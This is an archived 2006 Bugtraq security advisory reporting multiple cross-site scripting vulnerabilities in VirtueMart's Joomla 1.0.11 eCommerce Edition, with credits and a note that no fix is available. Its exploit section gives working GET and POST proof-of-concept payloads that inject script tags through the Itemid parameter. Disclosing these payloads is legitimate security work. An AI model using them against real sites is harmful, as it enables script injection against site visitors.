| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 27 Sep 2006 01:11:04 -0700
From: Base64 <base640@...il.com>
To: bugtraq@...urityfocus.com
Subject: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities
VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities
Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low
Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!
Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.
Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)
Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>
Solution:
*****************************************************************************
None at this time.
Credits:
*****************************************************************************
Discovered by Adrian Castro
Powered by blists - more mailing lists